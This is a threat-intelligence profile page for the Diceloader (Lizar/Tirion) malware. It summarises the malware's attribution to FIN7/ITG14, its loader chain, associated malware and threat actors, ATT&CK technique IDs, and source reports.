Diceloader

Malware Profile Updated 3 months ago

Download STIX

Preview STIX

Diceloader is a type of malware, short for malicious software, that is designed to infiltrate and damage computer systems. It can infect systems through various means such as suspicious downloads, emails, or websites, often without the user's knowledge. Once inside a system, it can steal personal information, disrupt operations, or even hold data hostage for ransom. Diceloader, also known as Lizar or Tirion, is part of a family of malware developed by ITG14, and has been used by numerous threat groups including FIN7 and FIN12. It has been observed in conjunction with other malwares like Emotet, IcedID, CobaltStrike, SVCReady, CargoBay, Pushdo, Minodo, AresLoader, LummaC2, Vidar, Gozi, Canyon, Nokoyawa Ransomware, and BlackBasta Ransomware. FIN7’s time-tested CARBANAK and DICELOADER malware continue to be in use; however, recent intrusions have seen a greater dependence on the POWERPLANT backdoor. The Domino Backdoor shares code overlap with the Diceloader family of malware. In one specific instance, STONEBOAT was observed first loading an intermediary loader called DAVESHELL, which then executed the final DICELOADER payload. The USB hardware was programmed to download STONEBOAT, which ultimately installed the DICELOADER framework on the victim system. Other payloads loaded by FIN7’s POWERTRASH include CARBANAK, DICELOADER, SUPERSOFT, BEACON and PILLOWMINT. The infection chain of Diceloader includes several stages: the DICELOADER backdoor, the DUBLOADER loader, the POWERHOLD persistence-establishing script, and the POWERTRASH obfuscated loader. The yet undocumented persistence script has been codenamed POWERHOLD, with the DICELOADER malware decoded and executed using another unique loader referred to as DUBLOADER. Mandiant is also tracking multiple notable campaigns suspected to be FIN7, including a “BadUSB” campaign leading to DICELOADER, and multiple phishing campaigns leveraging cloud marketing platforms leading to BIRDWATCH. The Bl00dy Ransomware Gang downloads legitimate remote access tools such as Atera RMM, uses Tor and/or other proxies, and additional malware such as Cobalt Strike Beacons, DiceLoader, and TrueBot.

What's your take? (Question 1 of 5)

Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.

Possible Aliases / Cluster overlaps

It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.

ID	Votes	Profile Description
FIN7	6	FIN7, a notorious threat actor group known for its malicious activities, has recently been identified as targeting a large U.S. carmaker with phishing attacks. This group, which has previously operated behind fake cybersecurity companies such as Combi Security and Bastion Secure to recruit security
Lizar	5	Lizar, also known as Tirion or Diceloader, is a malicious software developed by the threat group ITG14. It's designed to exploit and damage computers or devices, infiltrating systems through suspicious downloads, emails, or websites. Once installed, it can steal personal information, disrupt operati
Carbanak	4	Carbanak is a sophisticated type of malware, short for malicious software, that is designed to exploit and damage computer systems. It can infiltrate systems through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt
Tirion	4	Tirion, also known as Lizar or DiceLoader, is a type of malware developed by the threat group ITG14, also known as FIN7. First reported in March 2020, Tirion has been observed in numerous ITG14 campaigns up until the end of 2022. This malicious software can infiltrate systems through suspicious down
ITG14	2	ITG14, a threat actor identified in the cybersecurity industry, has recently been linked to malicious activities involving the Domino Backdoor. X-Force researchers have found substantial evidence connecting the Domino Backdoor to ITG14’s Carbanak Backdoor. The Domino Backdoor not only shares signifi
Dave Loader	1	Dave Loader, also known as Domino Backdoor, is a potent malware that has been utilized in various cybercrime operations. This malicious software is designed to infiltrate computer systems and compromise user data, often without the victim's knowledge. It can be delivered through dubious downloads, e
Trickbot/conti Syndicate	1	The Trickbot/Conti syndicate, also known as ITG23, is a threat actor group associated with various malicious activities. Since late February 2023, this group has been linked to Domino Backdoor campaigns utilizing the Dave Loader, a tool used to load malware onto targeted systems. The IBM Security X-

Miscellaneous Associations

Other elements of context that could aid in the identification of relevance

Loader

Malware

Backdoor

Bot

Cobalt Strike

Ransomware

Beacon

Payload

PowerShell

Mandiant

Phishing

Windows

t1059.001

t1059.003

t1059.005

t1059.007

t1204.001

t1204.002

t1569.002

t1195.002

T1199

Spearphishing

t1566.002

t1491.002

t1583.003

t1588.004

t1608.003

t1608.005

T1036

t1036.003

T1055

T1140

t1497.001

t1553.002

t1564.003

T1620

T1113

T1213

Lateral Move...

t1021.001

t1021.004

T1090

Proxy

t1132.001

t1573.002

T1012

T1033

T1057

T1069

t1069.002

T1082

T1083

T1087

t1087.002

T1482

T1518

t1110.002

t1555.003

t1558.003

t1070.004

t1218.011

T1059

t1566.001

t1588.003

T1027

t1027.005

t1218.010

T1560

t1071.001

T1095

T1105

Dropper

exploitation

Exploit

Encrypt

Antivirus

Trojan

Credentials

Veeam

Reconnaissance

Rmm

Associated Malware

To see the evidence that has resulted in this association, create a free account

ID	Type	Votes	Profile Description
Domino	Unspecified	3	The Domino malware, a harmful program designed to exploit and damage computer systems, has been identified as the culprit behind a series of high-profile cyber attacks. The first notable incident occurred when a hacker claimed to have accessed Domino's India's massive 13 TB database on the Dark Web,
Vidar	Unspecified	2	Vidar is a Windows-based malware written in C++, derived from the Arkei stealer, which is designed to infiltrate and exploit computer systems. It has been used alongside other malware variants such as Emotet, IcedID, CobaltStrike, SVCReady, CargoBay, Pushdo, Minodo, DiceLoader, AresLoader, LummaC2,
Domino Backdoor	Unspecified	2	The Domino Backdoor is a type of malware that has been linked to multiple threat groups, highlighting the complexity of tracking these actors and their operations. This malicious software, designed to exploit and damage computers or devices, can steal personal information, disrupt operations, or hol
Minodo	Unspecified	2	Minodo is a type of malware, a harmful program designed to exploit and damage computer systems. It can infiltrate your system through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt operations, or even hold data h
Cobalt Strike Beacon	Unspecified	1	Cobalt Strike Beacon is a type of malware known for its harmful capabilities, including stealing personal information, disrupting operations, and potentially holding data hostage for ransom. The malware has been loaded by HUI Loader through various files such as mpc.tmp, dlp.ini, vmtools.ini, and an
Nokoyawa	is related to	1	Nokoyawa is a notorious malware, particularly known for its ransomware capabilities. It has been associated with various other malicious software including Quantum, Royal, BlackBasta, Emotet, IcedID, CobaltStrike, SVCReady, CargoBay, Pushdo, Minodo, DiceLoader, AresLoader, LummaC2, Vidar, Gozi, Cany
Blackbasta	Unspecified	1	BlackBasta is a malicious software (malware) known for its disruptive and damaging effects on computer systems. It infiltrates systems through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt operations, or even ho
Aresloader	Unspecified	1	AresLoader is a type of malware that was first advertised for sale on the top-tier Russian-language hacking forum XSS in December 2022 by a threat actor named "DarkBLUP". This malicious software is designed to exploit and damage computer systems, often infiltrating through suspicious downloads, emai
Lummac2	Unspecified	1	LummaC2 is a relatively new information-stealing malware, first discovered in 2022. The malicious software has been under active development, with researchers identifying LummaC2 4.0 as a dynamic malware strain in November 2023. It's been used by threat actors for initial access or data theft, often
Carbanak C2	Unspecified	1	None
GRIFFON	Unspecified	1	Griffon is a type of malware, malicious software designed to infiltrate and damage computers or devices without the user's knowledge. It can be spread through dubious downloads, emails, or websites, and once inside a system, it can steal personal information, disrupt operations, or even hold data fo
Pillowmint	Unspecified	1	None
Lumma	Unspecified	1	Lumma is a prominent malware, particularly known as an information stealer. It is delivered through various means, including suspicious downloads, emails, and websites. In one instance observed by Palo Alto Networks’ Unit 42, Lumma was sent over Latrodectus C2 in an infection chain. In another campa
Gozi	Unspecified	1	Gozi is a notorious malware that has been linked to numerous cyber attacks. It's typically delivered through sophisticated malvertising techniques, often used in conjunction with other initial access malware such as Pikabot botnet agent and IcedID information stealer. When an individual accesses a c
IcedID	Unspecified	1	IcedID is a malicious software (malware) designed to exploit and damage computer systems. It infects systems through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt operations, or even hold data hostage for ransom
Cobaltstrike	Unspecified	1	CobaltStrike is a notorious form of malware that has been used in conjunction with other malicious software including IcedID, Qakbot, BazarLoader, Conti, Gozi, Trickbot, Quantum, Emotet, and Royal Ransomware. This malware is typically delivered through suspicious downloads, emails, or websites, ofte
Emotet	Unspecified	1	Emotet is a highly dangerous and insidious malware that has resurfaced with increased activity this summer. Originally distributed via email attachments, it infiltrates systems often without the user's knowledge, forming botnets under the control of criminals for large-scale attacks. Once infected,
Truebot	Unspecified	1	Truebot is a highly potent malware used by the threat actor group CL0P, which has been linked to various malicious activities aimed at exploiting and damaging computer systems. It can infiltrate systems through suspicious downloads, emails, or websites, often unbeknownst to the user. Once embedded,

Associated Threat Actors

To see the evidence that has resulted in this association, create a free account

ID	Type	Votes	Profile Description
FIN12	Unspecified	1	FIN12, also known as DEV-0237 and Pistachio Tempest, is a threat actor group notorious for its malicious cyber activities. Tracked by Microsoft, this group is primarily engaged in the distribution of Hive, Conti, and Ryuk ransomware. The group has been responsible for several high-profile ransomware
Bl00dy	Unspecified	1	Bl00dy is a threat actor known for its malicious activities in the cyber world. The group, along with another threat actor called Black Basta, have recently been identified as exploiting bugs in ConnectWise ScreenConnect, a popular remote management tool. This exploitation has led to a significant i

Associated Vulnerabilities

To see the evidence that has resulted in this association, create a free account

ID	Type	Votes	Profile Description
Birdwatch/jssloader	Unspecified	1	None

Source Document References

Information about the Diceloader Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more

Source	CreatedAt	Title
MITRE	7 months ago	FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7
CERT-EU	a year ago	Anomali Cyber Watch: Lancefly APT Adopts Alternatives to Phishing, BPFdoor Removed Hardcoded Indicators, FBI Ordered Russian Malware to Self-Destruct
CERT-EU	a year ago	Anomali Cyber Watch: APT37 Adopts LNK Files, Charming Kitten Uses BellaCiao Implant-Dropper, ViperSoftX Infostealer Unique Byte Remapping Encryption
CERT-EU	a year ago	Microsoft Confirms PaperCut Servers Used to Deliver LockBit and Cl0p Ransomware
SecurityIntelligence.com	a year ago	The Trickbot/Conti Crypters: Where Are They Now?
CERT-EU	a year ago	FIN7 cybergang tied to April PaperCut attacks \| #ransomware \| #cybercrime – National Cyber Security Consulting
CERT-EU	a year ago	FIN7 Hackers Caught Exploiting Recent Veeam Vulnerability
CERT-EU	a year ago	Ransomware gang exploiting unpatched Veeam backup products \| #ransomware \| #cybercrime – National Cyber Security Consulting
SecurityIntelligence.com	a year ago	Ex-Conti and FIN7 Actors Collaborate with New Domino Backdoor
CSO Online	a year ago	Cybercrime group FIN7 targets Veeam backup servers
SecurityIntelligence.com	a year ago	Ex-Conti and FIN7 Actors Collaborate with New Domino Backdoor
CERT-EU	a year ago	Google sheets & drive traffic along with this process in your network, means your are hacked
Securityaffairs	a year ago	The intricate relationships between the FIN7 group and members of the Conti gang
CERT-EU	a year ago	BlackCat Operators Distributing Ransomware Disguised as WinSCP via Malvertising
DARKReading	a year ago	FIN7, Former Conti Gang Members Collaborate on 'Domino' Malware
CERT-EU	a year ago	Russian cybercrime group FIN7 has been observed exploiting unpatched Veeam Backup & Replication instances in recent attacks, cybersecurity company WithSecure reports.